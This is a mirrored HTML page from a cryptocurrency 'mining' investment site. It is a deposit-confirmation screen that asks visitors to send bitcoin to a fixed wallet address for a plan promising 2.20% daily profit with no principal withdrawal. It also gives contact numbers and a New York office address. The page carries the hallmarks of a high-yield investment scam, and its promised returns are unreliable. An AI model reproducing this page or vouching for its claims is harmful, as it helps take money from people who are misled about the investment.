



   
               <script>
                window.location.href='../Auth.html';
                exit();
            </script>
        


<!DOCTYPE html>
<html lang="en">
   

<!-- Mirrored from diamondminingfx.com/index/User/btc.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 10 Dec 2021 10:15:21 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <!-- Title -->
      <title>diamondminingfx.com</title>
      
      <meta name="description" content=" " />
      <meta name="keywords" content=" " />
      <meta name="author" content="diamondminingfx.com" />
      
      <!-- Og tag-->
     <meta property="og:url" content="diamondminingfx.com" />
     <meta property="og:type" content="" />
     <meta property="og:title" content="diamondminingfx.com" />
     <meta property="og:description" content="" />
     <meta property="og:image" content="styles/images/social.png" />

            <!-- Favicon -->
      <link href="../../styles/images/favicon.html" rel="shortcut icon" type="image/png">
      <!-- Bootstrap CSS -->
      <link rel="stylesheet" href="netema/assets/css/bootstrap.min.css">
      <!-- Font awesome CSS -->
      <link rel="stylesheet" href="netema/assets/css/font-awesome.min.css">
      <!-- Animate CSS -->
      <link rel="stylesheet" href="netema/assets/css/animate.min.css">
      <!-- OwlCarousel CSS -->
      <link rel="stylesheet" href="netema/assets/css/owl.carousel.css">
      <!-- SlickNav CSS -->
      <link rel="stylesheet" href="netema/assets/css/slicknav.min.css">
      <!-- Magnific popup CSS -->
      <link rel="stylesheet" href="netema/assets/css/magnific-popup.css">
      <!-- Select2 CSS -->
      <link rel="stylesheet" href="netema/assets/css/select2.min.css">
      <!-- Main CSS -->
      <link rel="stylesheet" href="netema/assets/css/style.css">
      <!-- Responsive CSS -->
      <link rel="stylesheet" href="netema/assets/css/responsive.css">

</head>

   </head>
   <body>
       
       
      <!-- Preloader Start -->
      <!-- <div id="main-preloader" class="main-preloader semi-dark-background">
         <div class="main-preloader-inner center">
            <h1 class="preloader-percentage center">
               <span class="preloader-percentage-text">0</span>
               <span class="percentage">%</span>
            </h1>
            <div class="preloader-bar-outer">
               <div class="preloader-bar"></div>
            </div>
         </div>
      </div> -->
      <!-- Preloader End -->
       
       
      <!-- Header Area Start -->
      <header class="cryptobase-header-top-area">
<div class="header-top-area">
            <div class="container">
               <div class="row">
                  <div class="col-md-4">
                     <div class="header-top-left" style="
    line-height: 50px;
">
                        <p><i class="fa fa-phone"></i>+1 587 412 5990</p>
                        <p><i class="fa fa-envelope-o"></i><a href="#">support@diamondminingfx.com</a></p>
                     </div>
                  </div>
				  													    <div class="col-md-8">
                                         <div class="wallet-btn" style="margin: 8px 0;">
                   <a href="../Auth.html" style="padding: 3px 13px;background: #F44336 none repeat scroll 0 0;border: 1px solid #e43d31;">Exit Account</a>
                     </div>
                                                       </div>
													                  </div>
            </div>
         </div>
         <div class="mainheader-area">
            <div class="container">
               <div class="row">
                  <div class="col-md-3">
                     <div class="sitelogo">
                        <a href="#">
                        <img src="netema/assets/img/logo.png" alt="site logo" />
                        </a>
                     </div>
                     <!-- Responsive Menu Start -->
                     <div class="cryptobase-responsive-menu"></div>
                     <!-- Responsive Menu End -->
                  </div>
                  
                  <div class="col-md-2 col-sm-3">
                     <div class="wallet-btn">
					 												 <a href="account.html">Account</a>
												                                               </div>
                  </div>
               </div>
            </div>
         </div>
      </header>
      


<div class="res-ac">        
<div class="container">
<div class="row">
<div class="col-lg-12">
<div class="w3-clear nextprev">
     <a class="w3-left w3-btn" href="account.html"><i class="fa fa-user"></i>  Account</a>
<a class="w3-right w3-btn" href="../Auth.html"><i class="fa fa-sign-out"></i>  Logout</a>
    </div>
</div>
</div>
</div>
</div>
      <!-- Header Area End -->

<section class="cryptobase-breadcromb-area">
         <div class="breadcromb-top">
            <div class="container">
               <div class="row">
                  <div class="col-md-12">
                     <div class="breadcromb-top-text">

 <h2>Diamond Miningfx</h2>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class="breadcromb-bottom">
            <div class="container">
               <div class="row">
                  <div class="col-md-12">
                     <div class="breadcromb-bottom-text">
                        <ul>
                           <li><a href="#">home</a></li>
                           <li><a href="#"><i class="fa fa-long-arrow-right"></i></a></li>
                          
                        </ul>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </section>

<section class="cryptobase-single-service-area section_100">
         <div class="container">
		 
		 <div class="row">
               <div class="col-md-12">
                  <div class="single-service-page-left">
                     <div class="single-service-widget clearfix">
                        
                        <div class="single-service-text">

<h3>Please confirm your deposit:</h3><br><br>

<h1>Send your bitcoin deposit of $  to the address below:</h1><br><br><center>
</center>

<div style='background-color:#ffffff;' align='left'><font color='Black' size=''><b><img src="netema/assets/img/index.jpg" height="181" width="169"><strong style="font-size:24px">1Ht5TjkWFeHaPfBtRxRHLBJct1PMqBu3VG</strong></b></font>
</div>
<br><br><font color='red' size='5'><marquee>Ensure to copy address properly to avoid payment error
</marquee></font><br><br>

<table cellspacing=0 cellpadding=2 class="form deposit_confirm">
<tr>
 <th>Plan:</th>
 <td>Investment Plans</td>
</tr>
<tr>
 <th>Profit:</th>
 <td>2.20% Daily for 0 days </td>
</tr>
<tr>
 <th>Principal Return:</th>
 <td>No (included in profit)</td>
</tr>
<tr>
 <th>Principal Withdraw:</th>
 <td>
Not available </td>
</tr>
 
<tr>
 <th>Amount:</th>
 <td>$ </td>
</tr>

</table>
<br><br>
<form action="https://diamondminingfx.com/index/User/response4.php" method=post>
<input type=hidden name=fundamount  value="" >
<input type=hidden name=email  value="" >
<input type=hidden name=action  value="Pending" >

<br><input type=submit name="done" value="Done" class=sbmt> &nbsp;
</form>


</div></div></div></div></div>

</div>
</div>
</div>
</div>
            </div>
         </div>
      </section>

     <!-- Footer Area Start -->
<footer class="cryptobase-footer-area" id="footer-fixed">
         <div class="footer-top-area section_50">
            <div class="container">
               <div class="row">
                  <div class="col-md-3 col-sm-3">
                     <div class="single-footer-widget footer-logo-widget">
                        <div class="footer-logo">
                           <a href="#">
                           <img src="netema/assets/img/logo.png" alt="footer logo">
                           </a>
                        </div>
                        <div class="footer-widget-text">
                           <p>
                             diamondminingfx.com has professional trader team to manage fund & stable profit by Bitcoin, Crypto currency trading market.
                           </p>
                           
                        </div>
                     </div>
                  </div>
                 
              
                  <div class="col-md-3 col-sm-3">
                     <div class="single-footer-widget">
                        <h3>Contact Info</h3>
                        <p></p>
                        <p class=""><i class="fa fa-map-marker"></i> 375 Hudson Street 16th Floor New York, NY 10014. United States.</p>
                        <p><i class="fa fa-envelope-o"></i>  <a href="#">support@diamondminingfx.com</a></p>
                        
                       

                        
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class="copyright-area">
            <div class="container">
               <div class="row">
                   
                  <div class="col-md-6">
                     <div class="copyright-right">
                        <p>© Copyright <a href="#">diamondminingfx.com</a> 2021. All rights reserved</p>
                     </div>
                  </div>
 
                          <div class="col-md-6">
                    
                  </div>
                 </div>
                  
               </div>
            </div>
         </div>
      </footer>
      <!-- Footer Area End -->
<style>
.single-footer-widget p {
    margin: 0 0 15px;
}    
</style>         

       
      <!-- jQuery -->
      <script data-cfasync="false" src="../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.html"></script><script src="netema/assets/js/jquery.min.js"></script>
      <!-- Bootstrap JS -->
      <script src="netema/assets/js/bootstrap.min.js"></script>
      <!-- Magnific Popup JS -->
      <script src="netema/assets/js/jquery.magnific-popup.min.js"></script>
      <!-- OwlCarousel JS -->
      <script src="netema/assets/js/owl.carousel.min.js"></script>
      <!-- SlickNav JS -->
      <script src="netema/assets/js/jquery.slicknav.min.js"></script>
      <!-- Counter JS -->
      <script src="netema/assets/js/jquery.counterup.min.js"></script>
      <!-- Waypoints JS -->
      <script src="netema/assets/js/waypoints-min.js"></script>
      <!-- Preloader JS -->
      <script src="netema/assets/js/sPreloader.js"></script>
      <!-- Select2 JS -->
      <script src="netema/assets/js/select2.min.js"></script>
      <!-- Custom JS -->
      <script src="netema/assets/js/custom.js"></script>
      
<script type="text/javascript">window.$crisp=[];window.CRISP_WEBSITE_ID="affd610b-36b9-4dbd-b0f3-1834ba63721b";(function(){d=document;s=d.createElement("script");s.src="../../../client.crisp.chat/l.js";s.async=1;d.getElementsByTagName("head")[0].appendChild(s);})();</script>

<!-- GetButton.io widget -->
<script type="text/javascript">
    (function () {
        var options = {
            whatsapp: "+15874125990", // WhatsApp number
            call_to_action: "Message us", // Call to action
            position: "left", // Position may be 'right' or 'left'
        };
        var proto = document.location.protocol, host = "getbutton.io", url = proto + "//static." + host;
        var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = url + '/widget-send-button/js/init.js';
        s.onload = function () { WhWidgetSendButton.init(host, proto, options); };
        var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x);
    })();
</script>
<!-- /GetButton.io widget -->     
   </body>

<!-- Mirrored from diamondminingfx.com/index/User/btc.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 10 Dec 2021 10:15:27 GMT -->
</html>
